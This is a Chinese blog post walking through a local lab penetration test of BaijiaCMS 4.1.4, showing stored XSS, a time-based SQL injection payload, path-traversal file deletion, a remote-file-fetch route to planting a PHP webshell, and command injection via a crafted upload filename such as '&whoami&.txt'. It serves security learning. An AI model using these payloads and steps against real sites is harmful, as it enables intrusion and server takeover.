PHP代码审计--百家CMS4.1.4项目实战(上)

已于 2022-06-24 10:30:15 修改
阅读量3.1k 收藏 7
点赞数 2
分类专栏: php代码审计 安全漏洞 渗透测试 文章标签: 代码审计 安全漏洞 渗透测试 php web安全
于 2022-06-24 10:13:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/HEAVEN569/article/details/125440213
版权

PHP代码审计--百家CMS4.1.4项目实战(上)

前提:

最近工作有点闲,就想着开始拓展技能了,学一下代码审计,入门就从php开始吧。这个百家CMS项目,我分为两部分测试,一、是渗透测试纯黑盒测试 二、代码审计

一、项目介绍

百家CMS微商城是一款免费开源的面向对象的多店铺多用户微商城PHP开发框架,创建于2014年6月,遵循Apache Licence2开源协议发布,是为了快速简化企业微商城应用开发、帮助微商企业快速赚钱而诞生的。完善的商城购物系统,全方位商品展现+便捷的购买流程,完善的订单管理商品库存管理以及发货操作功能。

二、项目部署

2.1 工具及源码介绍

百家CMS4.1.4源代码下载: https://gitee.com/openbaijia/baijiacms.git

我是用phpstudy 2016搭建的环境,直接把项目放在www文件夹下面就可以了。

百家cms(baijiacms-master)是V4.1.4版本的

Phpstorm版本是2021.1.3

2.2环境的安装搭建

首先,看一下cms的README.md介绍文件,这是一套baijiaCMS的电商系统,我们需要在READM.md介绍文件中,查看一下搭建环境的所需配置版本,如果使用的版本和需求的不一样,可能会导致无法正常安装或者产生报错。

Ps:在代码审计时`README.md`文件是新手审计前必须要关注的一个文件,因为在这个文件中会写到安装时PHP版本要求以及代码结构中每个目录代表什么功能,这对接下来的审计是很有作用的。

首先我们把这里的过滤代码屏蔽一下,为了后面我们可以顺利测试sql注入,xss注入。

代码的位置:includes/baijiacms.php

直接进入http://127.0.0.1:8081/baijiacms-master

开始百家cms的安装,点击同意,下一步

下一步

这一步需要根据自己需求填写管理员信息,数据库信息按照自己的要求来填写,一般本地地址是127.0.0.1,账号密码则为目标数据库的账号密码。

进入登录页面url:http://127.0.0.1:8081/baijiacms-master/index.php

三、渗透测试

3.1、存储型XSS

使用安装时使用的管理员账号密码登录系统。

点击店铺管理—》添加店铺

在店铺名称的位置输入测试XSS payload:<script>alert(11);</script>

点击提交

再次查看店铺管理,发现弹出xss

3.2、SQL注入

在店铺管理---》店铺名称搜索框内搜索,使用burp抓包

正常的查询情况为

添加了测试payload:1234' and sleep(5) #

情况为下图,返回时间明显边长

直接使用sqlmap跑一下:python3 sqlmap.py -r 123.txt

发现是一种时间盲注

3.3、任意文件删除漏洞

进入备份与还原模块,点击备份商城数据

然后进入数据还原模块

点击删除 数据备份,使用burp抓包

发现url中的id参数为删除的数据库备份文件名称,既然这是文件,就试试能不能删除其他文件。

在WWW目录下创建一个abc目录(目录,重要的事情说两遍),然后将../../../abc 路径base64加密为Li4vLi4vLi4vYWJj  ,然后使用burp发包删除。

3.4、任意文件写入+getshell

首先需要创建一个店铺管理员账号,

在后台管理商城中有很多设置模块可以提取网络图片,

使用店铺管理员登录,进入商城设置—》会员订单入口—》选择图片

选择提权网络图片,随便输入然后,使用burp抓包

然后再开启一个简单的web服务,然后把请求包中的参数修改为我们开启的web服务的文件连接。

我是在window中开启,直接创建一个test文件夹,在文件夹中创建一个测试文件,然后在此目录下开启web服务。

命令:python -m SimpleHTTPServer 9001

修改请求包中的参数为我们开启的web服务上的文件。

url=http://127.0.0.1:9001/test.php

访问一下文件

再上传一个php一句木马上传,蚁剑连接试试,成功连接getshell

3.4、命令执行

这个命令执行在黑盒测试中很难测试出来,为什么这么说,并不是由于我们无法想到上传点处拼接命令这种测试方法,而是该处需要另外设置一处功能点后上传文件才可才可触发命令执行。

首先登录系统管理员账号进入“附件设置模块”进行开启配置。

然后登陆店铺管理员账号

进入第三方接入—》微信号设置模块,选择.txt文件进行上传

在filename处使用&拼接命令,造成命令执行。

参数:filename="&whoami&.txt"

参数:filename="&dir&.txt"

参考链接:

PHP代码审计之百家CMS4.1.4版本实战(下)之代码审计中的SQL注入&RCE&任意文件写入&任意文件删除等

https://xz.aliyun.com/t/10678

https://mp.weixin.qq.com/s?__biz=Mzg3MDU1MjgwNA==&mid=2247484280&idx=1&sn=9867290b6640418534318049899281be&chksm=ce8d46f3f9facfe57afb58b2c7ea286a25ee1dc7e8e225907035c28f72f365c084c8bab04781&scene=21#wechat_redirect

声明:

本文仅限于大家技术交流和学习,严禁读者利用本博客的所有知识点进行非法操作。如果你利用文章中介绍的技术对他人造成损失,后果由您自行承担,感谢您的配合,

作者创作不容易,请大家点赞收藏支持一下。谢谢各位读者大老爷。

HEAVM
关注
  • 2
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
百家cms V4.1.4源码下载
01-06
一款完善的php分销商城,可运营,我推荐了几个客户在用,安装后即可开始使用。 在addons文件夹里是一个插件范例,可以自定开发扩展插件。内含三级分销,可对接微信,支持支付宝支付的全网分销插件,结构简单,只要会php就懂得二次开发。
PHP代码审计--百家CMS4.1.4项目实战(下)
HEAVEN569的博客
06-24 759
这是百家cms的第二部分-代码审计
alexanderzobnin-zabbix-app-4.1.4.zip
07-14
Grafana-Zabbix 4.1.4 2021-03-09 grafana zabbix 插件 grafana-cli plugins install alexanderzobnin-zabbix-app https://storage.googleapis.com/plugins-community/alexanderzobnin-zabbix-app/release/4.1.5/alexanderzobnin-zabbix-app-4.1.5.zip failed to download plugin archive: Failed to send request read: connection timed ou
c代码-21年数据结构4.1.4
07-16
c代码-21年数据结构4.1.4
百家CMS代码审计
qq_42383069的博客
10-16 2674
3. 审计此时代码,发现后台接收前端传递的参数id,这里id外部可控,另外发现这里引用了rmdirs()函数,最后这里对删除的文件是否为文件夹做了一个判断,若是文件夹,则OK,若单纯的文件,则无法删除。4. 查看引用的rmdirs()函数,发现使用了删除函数rmdir(),所以这里我们可以手动构造其他文件来删除。语法: updatexml(XML_document,XPath_string,new_value)5. 可以看到,程序直接输出,无任何过滤,所以存在XSS漏洞。可以看到这里主要传递了前端输入的。
php代码审计实战(一)
goddemon
07-05 3218
源码:熊海CMS_1.0 安装方法:这里是用宝塔直接搭建的 ①数据库 需要宝塔建立一个数据库导入那个数据库文件就好了 然后安装的时候输入的数据库,账户,密码跟宝塔的数据库是一样的就好了 ②php版本问题:需要将php设置为5.6才可以进行运行 且注意:如果无法运行<?php phpinfo(); ?>需要去查看短标签和php配置禁用函数 审计过程 看个人习惯和时间去确定自己的审计方法吧 我的话 快审的话: 1.过一遍功能点,然后猜存在的漏洞,找到对应的代码进行审计 2.直接seay这些审计系统通
代码审计百家cms
qq_44029310的博客
07-25 1157
本文包括环境搭建,xdebug调试配置,以及六个漏洞的复现和分析加调试。
PHP代码审计——实操!
lulu001128的博客
08-02 800
解题过程
PHP代码审计-sql注入
博客地址 www.sec0nd.top
10-24 1236
最近想学代码审计了,但是我本身的代码水平不高,学的比较基础,适合入门级别的朋友们阅读先学php的审计,后面再学java的吧(java只懂一点点)就不太多的赘述漏洞和代码的基础了,遇到不会的搜索其他人的文章就可以学会的入门我是看的代码审计相关的一些知识后面实战的代码也在这里可以下载的。
PHP代码审计(全)
sechelper的博客
12-07 3336
PHP代码审计全流程,黑白盒测试,小技巧,实操案例
avalon-framework-api-4.1.4.jar
03-11
官方版本,亲测可用
Subrion CMS 4.1.4.zip
05-25
Subrion CMS 4.1.4 更新日志:2017-05-16错误#125:为多语言网站生成不正确的站点地图;错误#400:重新加载页面后,保持选定的参数在网格中;错误#419:头像不显示在收藏夹页面上;错误#425:如果文件名包含非拉丁...
hgdb-migration-v4.1.4.zip
12-14
HG-SABRE V4.1.4 , 支 持 图 形 化 迁 移 。 用 来 实 现Oracle|MySQL|SQLServer|DB2|KingbaseV7|KingbaseV8|DM7|DM8|HIGHGO 数 据 库 到 HIGHGO|PostgreSQL 数据库迁移的自动化。
Homebrew-4.1.4
最新发布
01-04
macos版Homebrew-4.1.4
gawk-4.1.4.tar.xz
06-30
gawk-4.1.4.tar.xz
深入解析 PHP 代码审计技术与实战【网络安全
yy1715713348的博客
11-16 134
登录某个网站并浏览其页面时,注意到了一些看起来不太对劲的地方。这些迹象可能是该网站存在漏洞或被黑客入侵的标志。为了确保这个网站的安全性,需要进行代码审计,这是一项专门针对软件代码进行检查和分析的技术。在本文中,我们将深入探讨代码审计的重要性和如何进行有效的代码审计
[php-代码审计]百家cms4.14
weixin_45237169的博客
12-06 550
学习一下代码审计,先从php开始
PHP代码审计-PHP危险函数及特殊函数
forget_mt的博客
02-20 919
PHP代码审计-PHP危险函数及特殊函数
PHP代码审计10—命令执行漏洞
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
08-04 1613
php命令执行基础与CTF例题分析
org.springframework.web.util.NestedServletException: Handler processing failed; nested exception is java.lang.NoClassDefFoundError: net/sf/ezmorph/Morpher at org.springframework.web.servlet.DispatcherServlet.triggerAfterCompletionWithError(DispatcherServlet.java:1287) ~[spring-webmvc-4.1.4.RELEASE.jar:4.1.4.RELEASE] at org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:961) ~[spring-webmvc-4.1.4.RELEASE.jar:4.1.4.RELEASE] at org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:877) ~[spring-webmvc-4.1.4.RELEASE.jar:4.1.4.RELEASE] at org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:966) [spring-webmvc-4.1.4.RELEASE.jar:4.1.4.RELEASE] at org.springframework.web.servlet.FrameworkServlet.doGet(FrameworkServlet.java:857) [spring-webmvc-4.1.4.RELEASE.jar:4.1.4.RELEASE]这是什么问题
06-07
这个错误通常是由于找不到类路径中的依赖库而导致的。根据您提供的错误信息,问题可能是应用程序缺少名为 "ezmorph" 的库或依赖项。 您可以尝试以下步骤来解决这个问题: 1. 确认您的应用程序的类路径中包含了名为 "ezmorph" 的库或依赖项。您可以检查您的项目依赖项,或者查看您的应用程序的构建文件(如 Maven pom.xml 或 Gradle build.gradle)。 2. 如果您确定 "ezmorph" 库已添加到应用程序的依赖项中,请检查您的依赖项版本是否正确。也可能是版本不兼容导致此错误。 3. 如果您使用的是 Maven 或 Gradle 等依赖管理工具,请尝试删除本地仓库中的 "ezmorph" 依赖项,然后重新构建您的应用程序。这有助于确保您使用的是最新的依赖项版本。 希望这些提示可以帮助您解决这个问题。如果还有其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值